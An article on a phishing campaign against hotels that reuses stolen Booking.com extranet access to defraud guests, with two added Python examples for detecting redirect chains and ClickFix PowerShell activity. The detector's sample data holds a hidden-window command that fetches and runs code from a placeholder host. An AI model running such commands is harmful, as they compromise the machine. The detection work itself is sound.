How Operation “I Paid Twice” Turns Hotels into Instruments of Global Fraud

Since the spring of 2025, a cyberattack campaign has hit hotels around the world with an effectiveness that has deceived thousands of travelers. The operation, named “I Paid Twice” by the Sekoia.io teams, rests on a simple idea: first infect the hotels themselves, then exploit their Booking.com accounts to trap guests with messages of almost perfect credibility.

The first breach: a booby-trapped email, sent from a legitimate account

The attack begins with an email addressed not to travelers, but to reservation desks or hotel administrative mailboxes. The messages come from compromised business accounts, sometimes belonging to unrelated companies, and realistically mimic Booking.com’s visual identity. The subject lines are designed to catch the attention of a busy receptionist: “New last-minute booking”, “New guest message” or “Tracking code”. Nothing indicates that the message is booby-trapped, and affected hotels sometimes receive several similar emails within a few days, as if booking activity were picking up.

The link in the message does not open a malicious page immediately but first passes through a complex redirect infrastructure. Hundreds of domain names, all built on the same pattern, send the user through intermediate HTTP pages containing nothing but a meta-refresh tag before handing them to the final URL. This architecture is typical of a TDS, a traffic distribution system designed to absorb blocking, hide the actual servers and survive takedown attempts.
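The meta-refresh hopping described above can be recognised in an analysis pipeline by walking the chain and counting pages that carry a refresh directive and nothing else. The following is an added example, not Sekoia.io’s tooling; the domains, paths and page bodies are constructed placeholders, and the fetcher is a dictionary lookup so it runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed TDS-style chain (placeholder domains): two hops that contain only a
# meta-refresh tag, then a landing page that imitates an extranet login form.
START = "https://booking-notify.example/guest-message?id=4471"
PAGES = {
    START:
        '<html><head><meta http-equiv="refresh" content="0;url=https://cdn-redir.example/r/9a1"></head><body></body></html>',
    "https://cdn-redir.example/r/9a1":
        '<html><head><meta http-equiv="refresh" content="0; URL=\'/final?x=1\'"></head></html>',
    "https://cdn-redir.example/final?x=1":
        '<html><head><title>Extranet</title></head><body><h1>Sign in</h1>'
        '<form action="/login"><input name="user"></form></body></html>',
}

class _RefreshScanner(HTMLParser):
    """Extract the meta-refresh target and note whether the page has any real content."""
    def __init__(self):
        super().__init__()
        self.target = None
        self.has_content = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.target = m.group(1)
        elif tag in ("form", "iframe", "img", "script"):
            self.has_content = True

    def handle_data(self, data):
        if data.strip():
            self.has_content = True

def follow_chain(start, fetch, max_hops=10):
    """Walk meta-refresh hops from start. Returns [(url, refresh_only), ...] in order."""
    hops, url, seen = [], start, set()
    while url not in seen and len(hops) <= max_hops:
        seen.add(url)
        html = fetch(url)
        if html is None:
            break
        s = _RefreshScanner()
        s.feed(html)
        hops.append((url, s.target is not None and not s.has_content))
        if s.target is None:
            break  # landing page reached
        url = urljoin(url, s.target)  # resolve relative refresh targets
    return hops

def looks_like_tds(hops, min_refresh_only=2):
    """Two or more content-free refresh hops is the pattern worth escalating."""
    return sum(1 for _, refresh_only in hops if refresh_only) >= min_refresh_only
```

With a real fetcher the same function also exposes the number of distinct domains crossed, which is the useful pivot when clustering these campaigns.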

The ClickFix trap: a PowerShell command that compromises the entire system

At the end of these redirections, the hotelier lands on a page that reproduces the interface of the Booking extranet, with the official branding, URL elements likely to inspire confidence and a fake reCAPTCHA of the ClickFix type. The manipulation consists of convincing the user to copy a PowerShell command into their terminal to “unblock access” or “verify their identity”. The operation takes only a few seconds, but it is enough to completely compromise the machine.
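From the defender’s side, the ClickFix step leaves a distinctive trace: a shell started from the desktop or a browser whose command text reaches out to a URL, hides its window or runs encoded or downloaded code. The scoring below is an added example, not part of the Sekoia.io report; the field names follow Sysmon process-creation events (ParentImage, Image, CommandLine), the script-block text of PowerShell Event ID 4104 can be passed in the CommandLine field, and the indicator patterns and sample events are assumed heuristics and constructed data.

```python
import re

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = {  # name -> pattern over the command or script-block text (assumed heuristics)
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def score_event(event):
    """Return (score, reasons). ParentImage is optional so 4104 script blocks fit too."""
    reasons = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return 0, reasons
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        reasons.append("shell launched from " + parent)
    for name, pattern in INDICATORS.items():
        if pattern.search(event["CommandLine"]):
            reasons.append(name)
    return len(reasons), reasons

def clickfix_alerts(events, threshold=2):
    """Keep events whose combined indicators reach the threshold."""
    alerts = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            alerts.append((e["CommandLine"], reasons))
    return alerts

# Constructed sample events (placeholder .invalid domain, no real payload).
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"Invoke-Expression (Invoke-WebRequest 'https://captcha-verify.invalid/fix').Content\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # routine admin task
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"Image": "powershell.exe",  # Event ID 4104 style: text pasted into an open console
     "CommandLine": "Invoke-Expression (Invoke-WebRequest 'https://captcha-verify.invalid/fix').Content"},
]
```

The threshold deliberately lets a plain console launch from explorer.exe through; one indicator on its own is ordinary desk activity, two together is what makes the front-desk workstation worth a look.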

Operation: messages sent to customers, enriched with real data

Once the workstation is compromised and extranet access captured, the attack enters its second phase. The cybercriminals log in to the hotel’s Booking.com account and retrieve reservation data: guest identities, dates of stay, amounts, photos of the establishment, previous message exchanges. This authentic information lets them contact guests and open a credible conversation, either directly through Booking’s messaging service or via WhatsApp.

Victims then receive a message reporting an alleged bank verification problem and asking them to confirm their details to avoid cancellation of their reservation. The link provided leads to a page that perfectly mimics Booking.com or Expedia, right down to the typography. These pages, hosted behind Cloudflare and concealed on a Russian ASN operated as bulletproof hosting, collect the card details entered by travelers. Sekoia.io confirms that several guests actually paid twice for their stay: once to the hotel, and a second time to the cybercriminals.

A criminal ecosystem structured around Booking access

Since 2022, Russian-speaking forums have been full of offers to buy and sell Booking logs harvested from machines infected by infostealers. Prices range from a few cents to several thousand dollars depending on the quality of the credentials, the number of establishments administered and the associated fraud potential. Some actors deal exclusively in buying and reselling these logs, such as the group operating under the pseudonym moderator_booking, which claims more than $20 million in revenue from this model.

Other cybercriminals specialize in collecting hotel administrators’ email addresses, scraping thousands of industry sites or offering databases sorted by country or category of establishment. Finally, teams of “traffers” take charge of distributing the malware, routing traffic from Twitter, Facebook or Google to the malicious pages in exchange for a share of the profits.

Together these form a thoroughly organized market, in which each stage of the fraud (infection, resale, validation, exploitation, phishing) can be handled by a specialized player.

A lasting threat to the hotel sector

The “I Paid Twice” campaign shows that hotels are exposed not because of a technical vulnerability specific to Booking.com, but because they offer cybercriminals a more accessible entry point. Their exposure stems from weak protection of front-desk workstations, the absence of network segmentation, the lack of staff training and a very strong dependence on reservation extranets. These compromises then translate into direct financial losses, refund requests, tension with guests, legal risk and lasting damage to reputation.

A repeatable model and a major alert for the industry

This fraud, built on the compromise of service providers and the exploitation of authentic data, reaches far beyond the hotel sector alone. It could be extended to any area whose value chain relies on extranets, management portals or poorly protected partner interfaces: travel agencies, holiday rentals, transport companies, but also logistics, healthcare, real estate and retail.

In an environment where these operations keep being refined, only a rigorous combination of staff training, hardened access and command of the digital tools in use will make it possible to contain this type of attack over the long term.